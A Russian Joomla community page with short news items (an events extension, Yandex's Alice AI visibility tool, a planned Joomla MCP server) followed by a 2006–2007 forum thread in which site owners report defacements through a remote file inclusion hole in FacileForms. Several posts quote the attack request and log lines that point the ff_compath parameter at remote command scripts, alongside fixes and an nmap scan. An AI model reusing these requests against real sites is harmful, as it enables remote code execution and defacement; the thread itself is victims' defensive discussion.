Новости Joomla

👩‍💻 Компонент "CS Афиши" для Joomla.

👩‍💻 Компонент "CS Афиши" для Joomla.

Расширение "CS Афиши" позволяет выводить список мероприятий, фильтровать их по датам, поиск по заголовкам и описанию.

В состав пакета расширений входят:
- Компонент "CS Афиши"
- Модуль "Календарь событий"
- Модуль "Предстоящие события"
- Библиотека "ImgResize"

Расширение "CS Афиши" позволяет выводить список мероприятий, фильтровать их по датам, поиск по заголовкам и описанию.

Модуль "Календарь событий" отображает предстоящие и прошедшие мероприятие на календаре, с отображением мероприятий на конкретную дату во всплывающем окне.

Модуль "Предстоящие события" показывает список предстоящий событий по порядку их наступления.

P.S. Расширение платное, но плата символическая, чисто для отработки приема платежей. Ключи без ограничения по времени, купившие сейчас - смогут обновляться без ограничений.

Разработчик - участник нашего сообщества Дмитрий Денисов (@codersite).

Страница расширения
Демо

Яндекс выпустил инструмент Видимость сайта в Алисе AI.

Яндекс выпустил инструмент Видимость сайта в Алисе AI.

С тех пор, как в поисковиках появились нейроответы ИИ, трафик на сайты стал гораздо меньше, так как пользователь стал получать информацию непосредственно на странице поисковика без перехода на сайт. Но при генерации ответа ИИ указывает источники - ссылки на сайты, информация которых была использована для генерации ответа.

Долгое время у всех был немой вопрос: "Как же теперь оценивать эффективность сайта?". Теперь этот на этот вопрос отчасти отвечает новый инструмент аналитики.
Процитируем справку Яндекса по инструменту:
На запросы пользователей в Поиске может отвечать Алиса AI. Ответы появляются в поисковой выдаче, в объектных ответах и на отдельной вкладке Поиска. В них чаще всего упоминаются страницы сайтов, на которые Алиса AI опиралась при подготовке ответа.

С помощью инструмента Видимость сайта в Алисе AI в Яндекс Вебмастере вы можете:
- узнать долю упоминаний сайта среди источников в ответах Алисы AI в Поиске и отследить динамику изменений;
- посмотреть примеры запросов, по которым страницы сайта показываются в ответах Алисы AI;
- посмотреть примеры сайтов той же тематики, которые часто упоминаются в генеративной выдаче.
Данные отображаются за последние 3 месяца и обновляются каждую неделю.

Статистика собирается только по тем запросам, по которым ваш сайт уже находится достаточно высоко в поисковой выдаче. Это позволяет анализировать видимость именно в той нише, где вы заинтересованы в продвижении, и избегать «размытия» по малозначимым для вас запросам.

Кроме того, такой подход обусловлен работой Алисы AI: она строит ответ с опорой на самые релевантные, информативные и качественные страницы, которые обычно занимают высокие позиции в Поиске.

Чтобы увидеть статистику вашего сайта в меню Яндекс.Вебмастера перейдите в раздел "Эффективность" и далее в "Показы сайта в Алисе AI".

В начале февраля 2026г. был вебинар с Михаилом Сливинским - амбассадором Поиска Яндекса, и в рамках вебинара была озвучена просьба сделать такой инструмент. Скорее всего разработка на тот момент уже велась, потому что от просьбы до релиза прошло около 2-х месяцев. В любом случае хорошо, что такая статистика появилась.

Показы сайта в Алисе AI в вашем Яндекс,Вебмастере.

@joomlafeed

👩‍💻 ИИ-админ для Joomla ближе, чем вы думаете: Joomla MCP.

👩‍💻 ИИ-админ для Joomla ближе, чем вы думаете: Joomla MCP.

В февральском номере Joomla Community Magazine в статье Evolving Joomla - Joomla CMS MCP Server: Opening the Door to AI-Powered Administration рассказывается о работе команды разработчиков над внедрением в ядро Joomla MCP-сервера.

Что такое MCP-сервер?
Последние годы всех захватывает бум ИИ-технологий. Появились ИИ-агенты - программы, устанавливаемые на сервер или компьютер, которые получают от вас запрос или задачу в человеческом виде и могут выполнять действия с файлами, ходить по сайтам, создавать сайты, программировать и т.д. Люди используют ИИ-агентов в самых разных ситуациях: от написания и проверки кода (даже там, где язык программирования не знаете совсем) до планирования путешествий и бронирования гостиницы.

ИИ-агенты могут использовать различные программные инструменты по протоколу Model Context Protocol (MCP). Для этого разработчик программы должен внедрить MCP в свой продукт или сервис. Так, например, ваш ИИ-агент может ходить по сайтам через браузер и собирать нужную информацию, управляя браузером через MCP-сервер. Или использовать функционал IDE PHP Storm для написания кода, сбора и отладки ошибок, использовать поиск PHP Storm по кодовой базе, а не простой текстовый поиск по файлам. MCP предоставляет набор функций для полноценного управления программным обеспечением.

В случае с Joomla, сервер MCP может предоставить администраторам следующие возможности:
- Автоматическое создание категорий, материалов и меню на основе карты сайта или PDF-файла.
- Создавайть SEO-оптимизированные заголовки и метаописания в пакетном режиме.
- Обновлять расширения на нескольких сайтах одновременно
- Создание посадочные страницы.

Важно отметить, что сервер MCP не задумывался как функция, доступная только «супер-администраторам». Цель инициативы — создать решение, которое будет простым в настройке, маломощным и доступным для широкого круга пользователей.

В процессе разработки точка входа Joomla (аналогично Site, Administrator, Api, Cli), которая будет работать с Streamable HTTP, необходимым для MCP. Аутентификация пока что предполагается на токенах, но затем планируется создание универсального OAuth-сервера для Joomla.
Фактические возможности MCP — инструменты, ресурсы и подсказки — реализованы в виде плагинов для обеспечения расширяемости. Таким образом ожидаем, что и сторонние разработчики смогут создавать MCP-плагины для внедрения поддержки своих расширений Joomla для работы с ИИ.

@joomlafeed

• 19 Ответов
  • 10272 Просмотров
*

Murz

• Новичок
  • 6
  • 2 / 0
C помощью дыры в компоненте FacileForms версии 1.4.4 у меня сегодня отдефейсили 3 сайта!
Хочу конешно выразить спасибо команде "cyber_error", которые произвели дефейс, что ничего не поломали, старый index.php аккуратно переименовали в old, но всё равно как-то не очень приятно ;)

Дыра, через которую дефейсили, находится в файле facileforms.frame.php, который запускал на исполнение скрипты:
http://www.acuariopeces.com/pnTemp/cmd.dat

Урл, через который всё это запускалось, выглядел так:
POST /components/com_facileforms/facileforms.frame.php?ff_compath=http://www.sv-sirzenich.de/images/c.jpg? HTTP/1.0

Ломануть получилось у них только через второй скрипт.

Причём, что интересно, ломанули не сам сайт, на котором был данный компонент, а соседние! По адресу находится скрипт, которому передаются команды и он умеет лазить по папкам и творить всякие другие интересные вещи...

Лечится либо удалением данного файла либо обновлением до новой версии. Так что всем, кто использует данный компонент, рекомендую в срочном порядке обновиться до новой версии и выпонить рекомендации, написанные на главной странице сайта
http://facileforms.biz/
« Последнее редактирование: 19.09.2006, 18:18:04 от Murz »
*

Murz

• Новичок
  • 6
  • 2 / 0
В Рунете вообще про то, что нашли дыру в FacileForms, тишина, вот поэтому и не получилось вовремя заклеить дырку пластырем ;)
*

userxp

• Живу я здесь
  • 2019
  • 403 / 6
  • Злой и ужасный бармалей
в КАЖДОМ php-файле ДОЛЖНА в начале присутствовать строка
defined( '_VALID_MOS' ) or die( 'Restricted access' );
иначе совместно со включенным register globals эти взломы будут везде.
Как правильно задавать вопрос службе технической поддержки  yes!
SGA CM 7.2.0 RC0 KANG Build GWK74 + s95allinonescript + CWM 5.0.2.6 + Modem XWKT3
*

smart

• Администратор
  • 6478
  • 1318 / 15
  • Хочешь сделать хорошо — сделай!
В Рунете вообще про то, что нашли дыру в FacileForms, тишина, вот поэтому и не получилось вовремя заклеить дырку пластырем ;)
ну я бы не сказал, что совсем тишина... в частности, в новости про FacileForms 1.4.6с мы же писали, что разработчики устранили уязвимости и настоятельно рекомендуют обновиться... а вот на Secunia вроде сообщений об уязвимости не было, и в официальном списке уязвимых расширений на форуме Joomla данный компонент тоже не числится...
*

Murz

• Новичок
  • 6
  • 2 / 0
ну я бы не сказал, что совсем тишина... в частности, в новости про FacileForms 1.4.6с мы же писали, что разработчики устранили уязвимости и настоятельно рекомендуют обновиться...
Там в списке уязвимостей написано только про SQL injection, а не про то, что можно любой php-код на сайте выполнить.

Всем добрый вечер.
Всталкнулся с такой бедой , пытаються ломонуть мой сайт перед апом ya, с помощью 83.143.162.10 - - [15/Mar/2007:23:38:03 +0300] "GET /com_facileforms/facileforms.frame.php?ff_compath=http://www.yenzero.com/wp-admin/c.in?? HTTP/1.1" 200 25972

Пробовал банить по входящим Ip тоесть 83.143.162.10, не помогает пользуються проксями
проверил сайта www.yenzero.com не существует, просканил Nmapom выдает
Initiating SYN Stealth Scan against server1.wisd0m.net (216.12.200.18) [1672 ports] at 23:41
Discovered open port 80/tcp on 216.12.200.18
Discovered open port 21/tcp on 216.12.200.18
Discovered open port 25/tcp on 216.12.200.18
Discovered open port 443/tcp on 216.12.200.18
Discovered open port 22/tcp on 216.12.200.18
Discovered open port 110/tcp on 216.12.200.18
Discovered open port 3306/tcp on 216.12.200.18
Discovered open port 143/tcp on 216.12.200.18
Discovered open port 993/tcp on 216.12.200.18
Discovered open port 995/tcp on 216.12.200.18
The SYN Stealth Scan took 38.68s to scan 1672 total ports.
Host server1.wisd0m.net (216.12.200.18) appears to be up ... good.
Забанил

что посоветуете, стоит com_facileforms 1.4.7re
*

smart

• Администратор
  • 6478
  • 1318 / 15
  • Хочешь сделать хорошо — сделай!
что посоветуете, стоит com_facileforms 1.4.7re
очень странно, эту дыру вроде ж давно закрыли... проверьте, что в начале файла /com_facileforms/facileforms.frame.php? есть строчка:

defined( '_VALID_MOS' ) or die( 'Restricted access' );

так нету у меня этого файла :o
*

userxp

• Живу я здесь
  • 2019
  • 403 / 6
здесь
83.143.162.10 - - [15/Mar/2007:23:38:03 +0300] "GET /com_facileforms/facileforms.frame.php?ff_compath=http://www.yenzero.com/wp-admin/c.in?? HTTP/1.1" 200 25972
написано обратное...
SGA CM 7.2.0 RC0 KANG Build GWK74 + s95allinonescript + CWM 5.0.2.6 + Modem XWKT3

Я сам раз десять проверил , в бекапах тоже , нет . в админ\сом_фацилаформ тоже нет ????

Люди помогите отловить гад*** , опять пытються дефейснуть????
172.174.45.39 - - [16/Mar/2007:21:59:35 +0300] "GET /components/com_facileforms/facileforms.frame.ph
p?ff_compath=http://www.grodmansskolan.se/cmd.txt?
*

userxp

• Живу я здесь
  • 2019
  • 403 / 6
покажи конец строчки

зы. это логи случаем не с винроута?

172.174.45.39 - - [16/Mar/2007:21:59:35 +0300] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://www.grodmansskolan.se/cmd.txt? HTTP/1.1" 200 27650
 никому плохого не  делал, ни кого не обижал. Наверное жадные конкуренты , давяться что я в yandex топе

нет apache
*

userxp

• Живу я здесь
  • 2019
  • 403 / 6
200 27650
нифига не понимаю...
утвердительный ответ на запрос (200=ОК) и размер файла 27650 байт....
ну была отдача или я чего-то недопонимаю...

ps. очень рекомендую воспользоваться htaccess.txt (переименовать в .htaccess)

делаю запрос GET /components/com_facileforms/facileforms.frame.php ответ 404
 .htaccess есть, настроен от эксплойтов но видно слабо настроен:(
А определить того как определить откуда ?
адрес определил nmapom .grodmansskolan.se -  212.75.88.27 вчерашний 216.12.200.18

забанил
что делать дальше?
« Последнее редактирование: 16.03.2007, 22:50:21 от tolyan »
*

userxp

• Живу я здесь
  • 2019
  • 403 / 6
так какая сейчас у тебя версия фасили и джумлы?
htaccess от какой версии?

Joomla последняя фацила 1.4.7 :o
*

userxp

• Живу я здесь
  • 2019
  • 403 / 6
1.
172.174.45.39 - - [16/Mar/2007:21:59:35 +0300] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://www.grodmansskolan.se/cmd.txt? HTTP/1.1" 200 27650
2.
делаю запрос GET /components/com_facileforms/facileforms.frame.php ответ 404

кто-то их вас двоих не прав :)

да знаю, что протеворечят ответы, но сам не могу понять, почему
*

oppo

• Захожу иногда
  • 365
  • 82 / 8
  • ΨΨΨ я - УКРАЇНЕЦЬ
вообще я считаю эти формы не нужны ..
что стоит написать модуль или бот с нужной формой сро всеми вкусностями кот. в данном случае нужны
Чтобы оставить сообщение,
Вам необходимо Войти или Зарегистрироваться

Можно ли автоматически выводить результаты заполненой анкеты на другую страницу сайта

Автор Veours

Ответов: 1
Просмотров: 8024
Последний ответ 18.04.2012, 01:24:14
от fragmarw
как перевести контактную форму созданную в FacileForms при помощи Joom!Fish?

Автор tierex

Ответов: 6
Просмотров: 10314
Последний ответ 18.01.2012, 10:24:19
от asav2011
FacileForms

Автор ps1panda

Ответов: 0
Просмотров: 16338
Последний ответ 12.12.2011, 14:10:55
от ps1panda
Ошибка после установки FacileForms 1.4.7 в Joomla 1.5.15